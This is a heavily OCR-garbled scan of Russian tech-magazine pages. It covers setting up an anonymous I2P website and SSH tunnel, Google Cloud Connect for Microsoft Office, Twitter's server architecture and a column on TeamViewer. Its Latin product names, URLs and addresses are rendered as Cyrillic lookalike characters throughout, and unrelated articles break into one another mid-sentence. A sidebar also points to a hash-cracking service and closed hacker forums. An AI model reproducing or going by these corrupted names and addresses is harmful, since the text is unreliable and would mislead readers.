нужно еще позаботиться о том, чтобы к нашему сайту была воз- 
можность обращаться по доменному имени. 

3. Системы 0Ы5 в І2Р как таковой нет, однако есть ее замени- 
тели. Поэтому мы можем зарегистрировать для нашего еерзііе 
доменное имя ( 5отеіЫпд.і2; ). Проверка, не используется ли оно 
кем-то еще, легко осуществляется через специальный сервис: 

1 27.0.0.1 :7657/зи5Іс1п5/асІс1ге55Ьоок.І5р?Ьоок=гои1:ег&Шег=попе . 
Убедившись в уникальности, переходим в настройки нашего 
туннеля и заменим в нем стандартное значение « туз і 1;е . і 2 р » 
выбранным именем (например, ха3 1 337ха.і2р). Не лишним 
здесь будет включить опцию «Автозапуск», чтобы наш сервис 
автоматически стартовал вместе с І2Р. 

4 . Минимальная настройка завершена! Вот теперь можно вклю- 
чить наш туннель. Для этого переходим в админку и для нашего 
еерзііе нажимаем кнопку «Старт». В столбце «Состояние» звез- 
дочка, отражающая текущий статус, сначала станет желтой, а потом 
зеленой. Если перейти на главную страницу админки, то в левой 
панели в категории «Локальные туннели» появится новая запись 

с нашим еерзііе. С этого момента анонимный хостинг запущен! 
Можно поделиться с кем-нибудь идентификатором в Вазе32- 
формате, и у человека без проблем откроется наш сайт в браузере. 



Анонимный серфинг 



Пускай возможность анонимного серфинга и не является 
основной для І2Р, но она все-таки реализована. Все, что нужно 
— прописать в браузере прокси: 127.0.0.1:4444. Но вопрос, 
насколько такой серфинг безопасен, ты должен решить сам. 
Для доступа к ресурсам интернета используются специальные 
шлюзы (так называемые оиіргоху). Соответственно, есть потен- 
циальный риск, что кто-то установил там снифер и мониторит 
весь трафик. Короче говоря, І2Р не для этого. Если хочешь 
выходить в инет через анонимный и шифрованный канал, то 
используй ѴРІ\І/Тог/55Н-туннель. І2Р — это, прежде всего, ано- 
нимный хостинг. 
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Локальная адресная книга вместо РЫБ 



5. Теперь надо доделать дела, связанные с доменным именем. 
Первым делом запись о выбранном домене надо добавить в 
свою собственную адресную книгу, используя веб-интерфейс 

1 27.0.0.1 :76б7/5и5Ібп5/абс1ге55Ьоок.]5р?Ьоок=ппа5І:ег . После этого 
можно попробовать обратиться к сайту с локальной машины, 
используя домен, и убедиться, что все работает. 

6 . Информацию о нашем еерзііе необходимо внести в распреде- 
ленные адресные хранилища вроде 5іаІ5.і2р . Если зайти на этот 
ресурс, то ты быстро найдешь форму для добавления новой запи- 
си. Здесь опять же необходимо указать доменное имя и локаль- 
ный адрес назначения (516 байт в Вазе64). Не забудь нажать на 
кнопку «ЗиЬтіІ». В чем смысл этой затеи? Многие клиенты пери- 
одически обновляют свои локальные адресные книги, получая 
свежие записи с этого сайта. Поэтому через некоторое время (от 
нескольких часов до нескольких дней] у каждого из таких пользо- 
вателей появится запись о нашем ха3 1 337ха.і2р . Получается пусть 
и тормозной, но аналог ВЫЗ-сервера. Юзеры, впрочем, могут 
сразу обратиться к нему через Вазе32-адрес или по ссылке сле- 
дующего формата: 5ІаІ5.і2р/сді-Ьіп/]иппр.сді?а=ха31 337ха.і2р . Если 
сайт представляет какой-то общественный интерес, то его можно 
добавить в ѵѵікі идЬа.і2р/еерзі1:еІпсІех и сделать объявление на 
официальном форуме Ьгит.і2р . 

7. Вот так просто мы подняли сервер, где крутится сайт, который 
крайне сложно отследить. Практически невозможно и ограничить 
к нему доступ. В завершение надо сказать, что ресурс даже нео- 
бязательно должен физически находиться на локальном компе, он 
может быть где угодно: в локальной сети или даже в инете. Ничто 
не мешает нам пробросить туннель не на 127.0.0.1:80, а, скажем, 
на 92.241.175.142:80 (это ір-шник хакер. ги ). 

Размещение 55Н-сервера 

Помимо непосредственно хостинга веб-серверов через І2Р 
вполне себе работают и многие другие сервисы. В качестве 
примера приведу настройки для создания ЗЗН-туннеля, что 
может быть полезно по меньшей мере для того, чтобы админи- 
стрировать свой еерзііе. Тут есть свои нюансы. 

1. Начнем с того, что через уже знакомую админку І2Р создадим 
новый туннель. Указываем адрес и порт нашего ЗЗН-сервера. 
Пусть это будет демон, запущенный где-то в нашей локальной 
сети: например, на роутере или точке доступа (для большей 
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Интересные внутренние 
ресурсы І2Р 



• — постоянно обновляемый индекс 
еерзііе, отображающий информацию о доступности того или 
иного сервиса; 

• 1хаскег2.ро5{іпап.і2р и ехо1таск.і2р — крупнейшие ВіЕГоггепІ- 
трекеры; 

• — сервис для взлома хешей (ЕМ, М05, МѴЗСИ- 
5НА1 , ІМПМ, 5НА1 и так далее); 

• ) и г — закрытые форумы хакерской 

тематики 

конкретики — 192.168.1.1:22). Далее нам потребуется адрес 
локального назначения, который сгенерировала админка. 
Переводим длинный идентификатор в сокращенную (Вазе32) 
форму — он нам потребуется для подключения. 

2 . Может показаться, что теперь все, что остается клиенту, это 
указать идентификатор сервиса в своем ЗЗН-клиенте (напри- 
мер, РиТТѴ). Но нет. Другие пользователи І2Р не смогут обра- 
титься к такому сервису напрямую. Придется использовать 
50СК5, а для этого, в свою очередь, создавать специальный 
туннель. Итак, на машине, с которой будет осуществляться под- 
ключение, необходимо открыть админку І2Р, зайти в раздел 
для администрирования туннелей, найти раздел «Клиентские 
І2Р-туннели» и создать туннель «50СК5 4/4а/5». По сути, един- 
ственная опция, которую нужно указать — это порт (для конкре- 
тики возьмем 5454). 

3. Теперь проверяем, как все работает. Открываем РиТТѴ, ука- 
зываем в качестве сервера идентификатор, полученный в пун- 
кте один. Переходим в настройки «Соппес1:іоп-> Ргоху» и в поле 
«Ргоху ргохупате» прописываем адрес, на котором мы только 
что создали ЗОСКЗ-туннель — 1 27.0.0.1:5454. Опции «0Ы5 пате 
Іоокир» должно быть выставлено значение «Уев» или «Аиіо». 

4 . Вот и все. Остается только присоединиться к серверу и убе- 
диться, что поверх защищенного І2Р отлично работает 55Н. 
Таким образом, можно хостить не только веб-серверы, но и мно- 
гие другие демоны. 

Безопасно ли? 

Осторожный читатель может задать вопрос: «А действительно ли 
І2Р может обеспечить 100% анонимность владельцу еерзііе?». 
Короткий ответ: нет. Несмотря на то, что сама система про- 
думана очень здорово, сдать владельца сервиса могут сами 
сервисы, которые хостятся в І2Р. Простой пример — уязвимость 
в веб-приложении. Если суметь ее проэскплуатировать до воз- 
можности выполнения команд, то есть большая вероятность 
выявить настоящий ІР-адрес компьютера. Это не единственная 
опасность. Если тебе интересна эта тема, рекомендую доклад 
Ігопдеек’а ( ігопдеек.сот ) об обнаружении скрытых сервисов в 
подобных сетях, который он недавно представил на хакерской 
конференции ВІаскНаІ 201 1 ОС. т 
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И МІСКОЗОРТ ОРПСЕ 



Интегрируем облачные возможности в «офис» 

© Для работы с документами я использую два инструмента: старый 
добрый МісгозоП Шее и онлайн-сервис боодіе 0ос$. 

Первый - удобнейший офисный пакет. Второй позволяет получить 
доступ к документам прямо из браузера, предоставляя систему 
контроля версий и удобные фишки для совместной работы. Хорошая 
идея - объединить их возможности! 



Два подхода — разные 
преимущества 



Честное слово, я долго пытался найти замену коммерческому 
Місгобоіі ОТТісе. Учитывая внушительное количество бесплатных и 



даже открытых приложений вроде ОрепСЖісе, ЫЬгеСЖісе, АЬіѴѴогсІ 
и так далее, было бы серьезным упущением их не попробовать. 

Но для себя я понял: это тот самый случай, когда деньги за про- 
дукт просят вполне обоснованно. Как бы я не старался перейти 
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Панель СІоисІ Соппесі 




Настройка совместного доступа 

на тот же самый ОрепОНісе, в случае каких-то проблем или 
затруднений всегда возвращался к давно знакомому решению 
от Місгозоіі. С другой стороны, мне очень нравится реализация 
офисного пакета в виде онлайн-сервиса. Тут речь прежде всего о 
боодіе Босз. Внутри редакции ][ у нас есть немало расшаренных 
через него документов, над которыми мы работаем совместно. 
Возможности не ограничиваются удобным сервисом для хранения 
рабочих файлов, полной синхронизацией и системой контроля 
версий, позволяющей вернуться к любой предыдущей вариации 
документа. Благодаря приобретению Гуглом проекта ЕібегРасІ в 
Оосз’ах стало доступно редактирование одного и того же доку- 
мента в реальном времени. Любые правки, внесенные одним 
из пользователей, моментально отображаются у других юзеров. 
Можно даже увидеть, в каком конкретно фрагменте документа 
установлен курсор у другого пользователя. Это очень удобно. 
После появления боодіе йосз как грибы стали появляться инстру- 
менты, позволяющие безболезненно перейти на использование 
онлайнового офисного пакета и, к примеру, быстро перенести все 
имеющиеся документы в облако. Меня этот вариант не устраивал, 
поскольку отказываться от самого ОНісе’а не хотелось. Скачивать 
документ, редактировать его локально, а потом опять заливать 
на сервер? Так себе идея. Идеальным вариантом мне виделось 
решение, которое интегрировалось бы в приложения ОНісе’а и 
позволяло прозрачно работать с документами, которые на самом 
деле хранятся в облаке Ѳоодіе йосз. Так, чтобы любой файл всег- 
да был засинхронизирован со своей версией на сервере, а рабо- 
тать над ним можно было одновременно с коллегами. 

Соодіе Росз + М5 ОТСісе = 
любовь 

Впервые подобная идея была добротно реализована в продукте 
0Ж5упс ( ѵѵѵѵѵѵ.оібзѵпс.сопп ). После установки аддона в при- 
ложениях Місгозоіі ѴѴогб, РоѵѵегРоіпІ и Ехсеі появлялась новая 
панель инструментов, с помощью которой и осуществлялось 
взаимодействие с онлайновыми сервисами Соодіе. Что это дает? 
Самое главное — возможность работать с документами, которые 
находятся в облаке. Доступ к документам из Соодіе йосз выпол- 
няется так же просто, как и к локальным файлам. Для навигации 
по файлам, которые лежат на сервере, разработчики реализовали 
отличный интерфейс с поддержкой меток (аналог папок) и систе- 
мой поиска. Доступ к любому документу легко предоставляется 
другим пользователям, которые могут открыть его через ОНіЭупс 
или через сам интерфейс Соодіе йосз (то есть просто в браузере). 



Кеѵізшп Ні^іоіу 

Вдѵіа.аіаЛЗ. 

С гпіпіЛез эдо Ьу іісрап.ііуіп 

Кеѵівіоп 12 

59 тігагіе® эдо Ьу зіерап.ііуіп 

ВСѴІ5ІРП 11 

1 Ьоиг эдо Ьу хісрап.ііуіп 

Каѵівіоп 10 

1 Ьоиг адо Ьу зіерап.ііуіп 



Разные версии файла 

Безусловно, затея была бы сомнительной, если бы над одной и 
той же презентацией или, например, электронной таблицей нель- 
зя было работать одновременно. Всякий раз, когда кто-то будет 
вносить изменения, ОбГіЗупс сообщит об этом в виде всплываю- 
щего сообщения в трее и предложит выполнить умную процедуру 
слияния правок (тегде). Таким образом, у каждого из пользовате- 
лей всегда будет самая последняя версия общего документа. 
Может возникнуть вопрос: почему до этой идеи не дошел сам 
Соодіе? На самом деле — дошел, но путь его был долог :). Все 
началось с покупки в марте прошлого года компании ОосѴегзе, 
у которой к этому времени был рабочий аддон для ОІТісе 
2007, позволяющий осуществлять интеграцию с Соодіе Оосз. 
Созданный двумя экс-сотрудниками Місгозоіі стартап был при- 
обретен за $25 000 000. Почти год ушел на адаптацию разра- 
ботки, и вот совсем недавно новая фишка Соодіе СІоисІ Соппесі 
^ог МісгозоН ОНісе ( іооіз.доодіе.сот/сііраде/сіоисісоппесі ) стала 
доступна всем желающим. Как и в случае с ОНіЭупс, после уста- 
новки надстройки в офисных приложениях появляется дополни- 
тельный тулбар, который добавляет офисным приложениям новые 
фичи. С этого момента можно делать резервные копии, открывать 
доступ к определенным документам Місгозоіі ѴѴогб, РоѵѵегРоіпІ и 
Ехсеі, работать над ними одновременно с другими пользователя- 
ми. СІоисІ Соппесі автоматически сохраняет на сервере внесен- 
ные правки, что делает совместное редактирование документа 
максимально простым. Ничто не мешает даже работать с доку- 
ментом офлайн: все изменения засинхронизируются, как только 
появится доступ в Сеть. Если в одни и те же фрагменты документа 
были внесены правки разными пользователями, и возникла кол- 
лизия, плагин предложит выбрать приоритетный вариант. Бояться 
тут нечего: даже если что-то пошло не так, всегда можно вернуть- 
ся к предыдущим ревизиям файла через удобный интерфейс. 

В завершение хочется сказать, что Місгозоіі сам предлагает 
облачный сервис для хранения документов ЗкуОгіѵе ( .кѵсігіѵе. 
Ііѵе.сот ) и веб-версии своих офисных приложений ОНісе ѴѴеЬ 
Аррз ( оШсе.тісгозоІІ.сот/ги-гиАл/еЬ-арр ). Само собой, ты можешь 
сохранить документ в облако прямо из любого приложения 
Місгозоіі ОНісе. Единственное — нужно позаботиться, чтобы в 
системе было установлено приложение ѴѴіпбоѵѵз І_іѵе Мезб. т 
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140 МИЛЛИОНОВ 
ТВИТОВ ВДЕНЬ , 

Как работает ТѵѵіНег изнутри? 



о Сервис, предлагающий делиться микросообщениями, ввел новый 
термин в языки всех стран мира, изменил образ жизни активной ау- 
дитории интернета и стал принципиально новым источником инфор- 
мации для миллионов людей. У разработчиков на это ушло 5 лет. 



Что такое твит? Это сообщение длиной до 140 символов с возмож- 
ность йссылки на пользователя и указания темы с помощью #хэш- 
тега. Человек публикует твиты в своем Тѵѵіиег-аккаунте — их читают 
его подписчики (они же — Гоііоѵѵег’ы). С точки зрения архитектуры 
сервиса все просто и примитивно, а рабочий прототип аналогично- 
го ресурса можно написать за час-другой, но... только если у тебя не 
175 000 000 пользователей. 

ТѵѵіЛег стартовал как небольшой побочный проект научно- 
исследовательской компании Обео, но темпы его роста оказались 
ошеломительными. Путь от нуля до миллионов просмотров страниц 
занял всего несколько коротких месяцев. Ранние решения о про- 
ектировании системы неплохо справлялись с небольшими нагруз- 
ками, но они начали быстро сдавать позиции под напором огром- 
ного количества пользователей, желающих разослать всем своим 
друзьям весточки с ответом на простой вопрос «Чем ты занима- 
ешься?». 140 000 000 — столько сообщений в среднем отправляют 



пользователи ТѵѵіЛег каждый день. И сервис хорошо выдерживает 
такую нагрузку. 

Обработка запросов 
пользователей 

Активная аудитория ТѵѵіЛег генерирует неимоверное количество 
запросов через веб-страницы и программный интерфейс, кото- 
рый используют для своей работы все приложения-клиенты (как 
для десктопных, так и для мобильных ОС). Любопытно, что лишь 
25% трафика приходится на веб-сайт, остальное идет через АРІ. 

Это легко объяснить: только за последний год рост числа мобиль- 
ных пользователей, которые активно твиттерят, составил 182%. 
Статистика впечатляет: 6 000 000 000 запросов к АРІ в день, около 
70 000 в секунду! Так как оба способа взаимодействия с сервисом 
основаны на НТТР, методы их обработки практически идентичны. 
Для генерации страниц используется в основном известный фрейм- 
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Архитектура средств для обработки запросов 



Распределение запросов между 
веб-интерфейсом и АРІ 



ворк РиЬу оп Раііз, притом практически вся работа «за сценой» 
реализована на чистом РиЬу или Эсаіа. Многие говорят, что Рыбу 
оп Раііз — далеко не самый производительный фреймворк, на что 
представители Тѵѵіиег отвечают, что использование более быстрого 
решения позволило бы выиграть 10-20% в производительности, но 
благодаря РоР на ранних стадиях проекта был быстро реализован 
механизм горизонтального масштабирования. Последний позволил 
легко подключать новые сервера к системе без изменения кода 
и, как следствие, достичь роста производительности системы на 
несколько порядков. Сейчас проект использует более тысячи сер- 
веров, которые расположены в ЫТТ Аппегіса, однако планируется 
переезд в собственный датацентр. От «облаков» и виртуализации 
разработчики отказались с самого начала: существующие решения 
страдают слишком высокими задержками, особенно при доступе к 
дисковой подсистеме. 

В роли балансировщика нагрузки используется привычный Арасбе 
ИПрсІ, но с учетом основного инструмента разработки, для обработки 
самих запросов необходим сервер приложений для ПиЬу. Для этого 
используется ІІпісогп, который имеет массу положительных сторон 
— например, развертывание новых версий кода без простоя, более 
низкое (до 30% меньше) потребление вычислительных ресурсов и 
оперативной памяти по сравнению с другими решениями. Связка 
«Арасбе + ІІпісогп» хорошо работала в начале. Но по мере разви- 
тия проекта начали всплывать и серьезные недостатки решения: в 
подсистеме кэширования стали наблюдаться проблемы с инвалида- 
цией (удалением устаревших данных), а АсбѵеРесогсІ, автоматиче- 
ский генератор 5СН_-запросов в РиЬу, как оказалось, использует не 
самые удачные варианты, что непременно замедляет время отклика 
и приводит к высоким задержкам в очереди и при репликации. Эти 
проблемы пришлось решать. 

Кэширование 

При таком потоке входящих запросов очень важно всеми доступны- 
ми способами снижать нагрузку на прослойку базы данных, иначе 
расходы на приобретение нового оборудования начнут зашкали- 
вать. Наиболее распространенным решением в этой области явля- 
ется кэширование сериализованных объектов и значений, полу- 
ченных ранее из базы данных или от пользователя. Они хранятся 
в специализированном сервисе, представляющем собой распре- 
деленную хэш-таблицу в оперативной памяти с примитивным про- 
токолом доступа (по сути, есть два элементарных действия: «взять» 
и «положить»). Самым популярным решением в этой области 
является теппсасЬесІ, который заслужил доверие благодаря своей 
универсальности и чрезвычайно высокой производительности. 
Впрочем, даже тот факт, что инструмент используется практически 



в каждом высоконагруженном проекте, вовсе не означает, что он 
идеален. Вот и Тѵѵіиег, используя чистый теппсасЬесІ, очень рано 
начал сталкиваться с ошибками Эедппепіаііоп Ра и и (сбой при обра- 
щении к недоступным для программы участкам памяти). Более того, 
большинство стратегий кэширования основывается на длинных 
ТТІ_ (более минуты), а вытеснение информации делает его непри- 
годным для хранения важных конфигурационных данных. Поэтому 
кэширующие сервера пришлось распределять на несколько групп 
для улучшения производительности и снижения риска вытеснения 
данных. Не обошлось без собственных доработок. В Тѵѵіиег исполь- 
зуется оптимизированная библиотека для доступа к теппсасЬесІ из 
Рыбу на основе ІіЬтетсасбесІ и алгоритма хэширования РІЧѴ вме- 
сто чистого РиЬу и тсІ5. 

Хранение данных 

На сегодняшний день в Тѵѵіиег используется множество различных 
систем хранения данных, у каждой из которых есть свои слабые и 
сильные стороны. В разных частях проекта применяется соответ- 
ствующее поставленным задачам решение. Изначально для посто- 
янного хранения твитов и других данных использовалась Му5СН_. 

Но на практике оказалось, что данные социальных сетей плохо 
подходят для хранения в реляционных СУБД. Этому есть немало 
причин: отношение «многие ко многим», сложность социального 
графа, необходимость обхода деревьев. Фактически использование 
привычных СУБД выливается в проблемы с дисковой подсистемой. 
Решением этих проблем стало использование РІоскОВ — масшта- 
бируемого хранилища для данных социального графа, построен- 
ного поверх множества серверов Му5СН_. Разбиение данных берет 
на себя сервис под названием ѲІ 22 ап± Ребра графа хранятся и 
индексируются в обоих направлениях, помимо этого производится 
распределенный подсчет количества строк. Приведу немного цифр. 
В базах Тѵѵіиег’а содержится более 13 000 000 000 ребер графа, 
при этом осуществляется 20 000 операций записи и 100 000 опера- 



Любопытная статистика 



3 года, 2 месяца и 1 день потребовалось Тѵѵіиег, чтобы набрать 
миллиард твитов. Сегодня для этого пользователям нужна всего 
одна неделя. 

4бО ООО аккаунтов в среднем создается каждый день. 

6 939 твитов составляет рекордный показатель ТР5 (твитов в 
секунду), поставленный через 4 секунды после наступления 
Нового года в Японии. 
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• Расширяемое хранилище 
для социального графа 

• Управление через СіггагсІ 

• Работает поверх множества 
серверов МуБСН. 

• 100 000 операций записи в 
секунду 

• Открытый код 
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Схема работы РІоск 



ций чтения в секунду. Среднее время на выполнение операций в 
РІоскОВ достаточно низкое: 

• Подсчет количества строк: 1 мс 

• Временные запросы: 2 мс 

• Запись: 1 мс для журнала, 16 мс для надежной записи 

• Обход дерева: 100 граней/мс 

Ранее в ТѵѵіНег’е планировали для хранения всех твитов постепен- 
но перейти на другой проект, а именно Саззапбга. Решение изна- 
чально был разработано в РасеЬоок как распределенная система 
хранения данных, ориентированная на работу в реальном времени. 
Ее основная отличительная особенность — невероятно высокая 
производительность на запись, но за это пришлось заплатить высо- 
кими задержками при случайном доступе к данным. Так как система 
децентрализована, сбои в оборудовании переносятся практически 
незаметно. Однако переход на Саззапсіга в ТѵѵіИег не состоялся: 
стратегия по этому вопросу изменилась. Попытки использовать ее 
в роли основного хранилища для твитов прекратились, но она про- 
должает использоваться для составления аналитики в реальном 
времени. 

Кластеры внутри ТѵѵіКег 

Пользователи Тѵѵіііег генерируют огромное количество данных: 
около 15-25 Гб в минуту, то есть более 12 Тб в день. Цифра 
удваивается несколько раз в год. Если считать, что средняя 
скорость записи современного жесткого диска составляет 80 
Мб в секунду, запись 12 Тб данных заняла бы почти 48 часов. 

На одном даже очень большом сервере данную задачу не 
решить. Логичным выходом стало использование кластера 
для хранения и анализа таких объемов данных. Подходящим 
решением в этой сфере оказался свободный баѵа-фреймворк 
Арасбе Набоор для выполнения распределенных приложений, 
работающих на больших кластерах, построенных на обычном 
оборудовании. Набоор прозрачно предоставляет приложениям 
надежность и быстродействие операций с данными. В про- 
екте реализована вычислительная парадигма, известная как 



МарРебисе. Согласно этой парадигме, приложение разделяется 
на большое количество небольших заданий, каждое из которых 
может быть выполнено на любом из узлов кластера. В дополне- 
ние предоставляется распределенная файловая система ГЮРЗ 
(Набоор ОізІгіЬиІеб Еііе Эузіепп), использующая для хранения 
данных вычислительные узлы кластера, что позволяет достичь 
очень высокой агрегированной пропускной способности кла- 
стера. Эта система позволяет приложениям легко масштабиро- 
ваться до уровня тысяч узлов и петабайт данных. Источником 
вдохновения для разработчиков Набоор послужили материалы 
по боодіе Еііе Эузіет (6Е5). 

Другими словами, ЕЮЕ5 занимается автоматической репли- 
кацией и помогает справляться со сбоями оборудования, а 
МарРебисе позволяет обрабатывать огромные объемы данных, 
анализируя пары ключ-значение с помощью разработки спе- 
циального кода на баѵа. Типичные вычислительные задачи, 
которые решаются с помощью Набоор в Тѵѵіиег: вычисление 
связей дружбы в социальном графе, подсчет статистики (коли- 
чество пользователей и твитов, например подсчет количества 
твитов занимает 5 минут при 1 2 000 000 000 записей), подсчет 
РадеРапк между пользователями для вычисления репутации. 
Чтобы анализировать данные с помощью МарРебисе, обычно 
необходимо разрабатывать код на баѵа, что довольно трудоемко. 
Поэтому для упрощения обработки больших объемов данных 

ТѵѵіНег активно использует открытый протокол автори- 
зации ОАиіН 

АссеиІЫцеп 

с/а Сапиітвг Кву 
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Внутренние подпроекты ТѵѵіПег 



В крупных интернет-компаниях часто находятся задачи, кото- 
рые не удается решить средствами готовых орепзоигсе или 
даже платных решений. В таких ситуациях небольшая часть 
команды проекта начинает разработку собственной подсистемы 
для решения возникшей задачи: зачастую она идет вразрез с 
общей платформой из-за своей специфики. Стечением време- 
ни такие подпроекты становятся все более обособленными и в 
какой-то момент команда решает, что продукт стал достаточно 
зрелым, универсальным и независимым, чтобы опубликовать 
его как орепзоигсе. Саззапсіга и ЗсгіЬе, например, в свое время 
полностью прошли этот путь в РасеЬоок, а на сегодняшний день 
используются и в Тѵѵіиег. 

В самом Тѵѵіиег ведется работа над несколькими собственными 
инструментами, которые, правда, еще не успели полноценно 
«встать на ноги» в качестве отдельных продуктов: 

• І_оопу — централизованная система управления оборудова- 
нием, реализованная с использованием Руібоп, О і а п д о , Му5С!І_ 
и Рагатіпко (реализация протокола 55Н на Руібоп). Решение 
интегрировано с ЮАР, анализирует входящую почту от дата- 
центра и автоматически вносит изменения в базу. 

• Мигсіег — система развертывания кода и ПО, основанная на 
протоколе ВііТоггепі Благодаря своей Р2Р-природе позволяет 
обновить более тысячи серверов за 30-60 секунд. 

• Кезігеі — распределенная очередь, написанная на Зсаіа и 
работающая по протоколу тетсасбе. То есть, существуют две 
команды: «зеі» (поставить задачу в очередь) и «деі» (взять из 
очереди). Из особенностей можно назвать отсутствие строгого 
порядка выполнения заданий и общего состояния между сер- 
верами. 




Скетч будущего сервиса на листке бумаги 



обычно разрабатываются специализированные системы, доступ- 
ные людям и без навыков программирования. Так, в Тѵѵіиег 
используют Рід, как раз один из такого рода продуктов, пред- 
назначенный для работы с данными в Набоор. Он представляет 
собой высокоуровневый язык, позволяющий трансформировать 
огромные наборы данных шаг за шагом. Синтаксис немного 

Новый интерфейс ТѵѵіМег'а 
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Ошибка «Кит» 



напоминает ЗОБ, но гораздо проще, что позволяет писать в 20 
раз меньше кода, чем при анализе данных с помощью обычных 
МарРебисе-работ. Большая часть действий по анализу данных в 
Тѵѵіиег осуществляется именно с помощью Рід. Вообще на осно- 
ве Набоор в Тѵѵіиег начинают строить ряд сервисов — например, 
поиск людей. Для этого используется орепзоигсе распределен- 
ная система хранения данных НВазе, построенная по подобию 
основной базы данных в Ооодіе — ВідТаЫе. По сути, она пред- 
ставляет собой изменяемую прослойку над БЮРВ, позволяющую 
осуществлять доступ к данным в структурированном виде. В 
отличие от традиционных СУБД, данные хранятся по столбцам, а 
не по строкам, а также для всех ячеек хранится история, то есть 
возможность получить данные на какой-то момент времени в 
прошлом, даже если они были перезаписаны. 

Обработка статистических 
данных 

Еще один важный тип данных — это различного рода журналы, 
которые необходимо не просто ввести, но еще и анализиро- 
вать. Изначально для сбора логов использовали привычное 
для этих целей решение зузіод-пд, но оно очень быстро пере- 
стало справляться с нагрузкой. Решение нашлось очень про- 
сто: программисты РасеЬоок, столкнувшиеся с аналогичной 
задачей, разработали проект ЗсгіЬе, который был опубликован 
в орепзоигсе и позже был взят на вооружение в Тѵѵіиег. По сути 
это фреймворк для сбора и агрегации логов. Ты пишешь текст 
для логов и указываешь категорию записи — остальное инстру- 
мент берет на себя. ЗсгіЬе работает локально и надежен даже 
в случае потери сетевого соединения. Каждый используемый 
узел знает только, на какой сервер передавать логи, что позво- 
ляет создавать масштабируемую иерархическую систему для 
сбора логов. Поддерживаются различные схемы для записи 
данных, в том числе обычные файлы и БЮР5 (к этой файловой 
системе мы вернемся ниже). Этот продукт полностью решил 
проблему Тѵѵіиег со сбором логов, позволив логически раз- 
бить поток информации на примерно 30 категорий. В процессе 
использования программисты активно сотрудничали с коман- 
дой РасеЬоок, была создана и опубликована масса доработок. 

Как они справляются с такими 
темпами роста? 

Хороший вопрос. Рецепт от Тѵѵіиег довольно прозаичен, но зато 
эффективен и подходит практически для любого интернет-проекта: 
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• обнаружить самое слабое место в системе; 

• принять меры по его устранению; 

• перейти к следующему самому слабому месту. 

Ріа словах это может звучать довольно примитивно, но на 
практике нужно предпринять ряд мер, чтобы такой подход был 
реализуем. В первую очередь это автоматический сбор метрик 
(причем в агрегированном виде), построение графиков, а также 
сбор и анализ логов. Все данные должны появляться с мини- 
мальной задержкой, то есть как можно более близко к реаль- 
ному времени. При анализе логов необходимо не просто полу- 
чать информацию, а следить за динамикой показателей: стало 
лучше или хуже? Особенно это актуально при развертывании 
новых версий кода. 

Золотое правило: планирование использования ресурсов 
намного проще, чем решение экстренных ситуаций, когда 
доступные ресурсы на исходе. Примерами агрегированных 
метрик в Тѵѵіиег являются «киты» и «роботы», вернее их коли- 
чество в единицу времени. Что такое «робот»? Ошибка внутри 
Раііз (НТТР 500), непойманное исключение, проблема в коде 
или нулевой результат. Что такое «кит»? Это НТТР-ошибки 502 
и 503, таймаут в 5 секунд (лучше кому-то показать ошибку, чем 
захлебнуться в запросах), убитый слишком длинный запрос к 
базе данных (плкіЩ. Значительное превышение нормального 
количества китов или роботов в минуту является поводом для 
беспокойства. Механизм подсчета их количества реализован 
простым ЬазЬ-скриптом, который просматривает агрегирован- 
ные логи за последние 60 секунд, подсчитывает количество 
китов/роботов и рассылает уведомления, если значение оказа- 
лось выше порогового. 

Для экстренных ситуаций в Тѵѵіиег даже предусмотрен так 
называемый «темный режим», который представляет собой 
набор механизмов для отключения тяжелых по вычислитель- 
ным ресурсам или вводу-выводу функциональных частей сайта. 
Получается что-то вроде стоп-крана для сайта. Есть около 
шестидесяти выключателей, в том числе и полный режим 
«только для чтения». Все изменения в настройках этого режи- 
ма фиксируются в логах и сообщаются руководству, чтобы никто 
не баловался :). 



Подводим итоги 

Какие рекомендации дают разработчики Тѵѵіиег создателям 
быстро растущих стартаптов? 

1. Не бросай систему на самотек, начинай собирать метрики и 
их визуализировать как можно раньше. 

2 . Заранее планируй рост требуемых ресурсов и свои действия 
в случае экстренных ситуаций. 

3. Кэшируй по максимуму все, что только возможно. Все инже- 
нерные решения не вечны, ни одно из них не идеально, но 
многие будут нормально работать в течение какого-то периода 
времени, так что заранее начинай задумываться о плане мас- 
штабирования. 

4 . Не полагайся полностью на тетсасЬесІ и базу данных — они 
могут подвести в самый неподходящий момент. 

5 . Все данные для запросов в реальном времени должны 
находиться в памяти, диски используются лишь для хранения 
архива. 

6 . По возможности приближай вычисления к данным. 

Работа Тѵѵіиег далеко не всегда была гладкой. Бывали про- 
стои, сложности получения данных через АРІ и другие про- 
блемы. Более того, архитектура проекта сильно изменилась за 
последнее время. Если взять презентации разработчиков двух- 
годичной давности и сравнить их с положением дел сегодня, то 
это будут две очень разные системы. Но по-другому, вероятно, 

и быть не могло. Сейчас это один из наиболее стремительно 
растущих стартапов, на которые можно смотреть лишь с вос- 
хищением. Ц-Ц 
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Колонка редактора 

Про ТеатѴіеѵѵег и удаленный рабочий стол 



Не могу не поделиться восхищением по 
поводу развития проекта ТеатѴіеѵѵег. С этим 
инструментом я познакомился довольно 
давно, когда мне потребовалось быстро 
подключиться к удаленному рабочему столу 
компьютера, который находился за ІМАТ. 
Поскольку реального ІР’шника у хоста не 
было, то стандартные инструменты ПОР и 
ѴІ\ІС не подходили. Здесь-то и пригодилась 
программа ТеатѴіеѵѵег со своей главной 
фишкой: ей не помеха ни І\ІАТ, ни файрвол. 
Она просто работает. Не надо морочить 
себе голову пробросом портов или допол- 
нительной настройкой брандмауэра — во 
многих случаях это сделать банально невоз- 
можно. Да и попробуй объяснить ушастому 
приятелю, что такое «серый I Р-адрес», когда 
у него и так ничего не работает, и все, о 
чем он просит, это как раз твоей помощи. 

С ТеатѴіеѵѵег задача решается на раз-два. 
Человек запускает приложение и ему выда- 
ется связка «уникальный идентификатор 
— пароль для доступа». Тебе в свою очередь 
остается ввести эти данные для выполнения 
подключения. Технология концептуально 
очень простая. Если к компьютеру нельзя 
приконнектиться напрямую, то он должен 
сам выполнить подключение. Поскольку 
соединение возможно не сможет принять и 
клиент, то необходим промежуточный хост, 
который и будет связывать между собой кли- 
ентскую и серверные части ТеатѴіеѵѵег. По 
этой причине программа сразу после запуска 
обращается к специальному серверу Кеер- 
Аііѵе. Сложность для ТеатѴіеѵѵег тут скорее в 
том, чтобы справиться с громадным количе- 
ством подключений и передаваемого через 
себя трафика. Если верить официальной 
статистике со страницы проекта, то сейчас 
разработкой пользуются более 100 000 000 
пользователей. Изящность реализации и 
многочисленные приятные фишки легко объ- 
ясняют происхождение этой цифры! 
Максимально упрощенная версия про- 
граммы ОиіскЗиррогІ — отличный вариант 
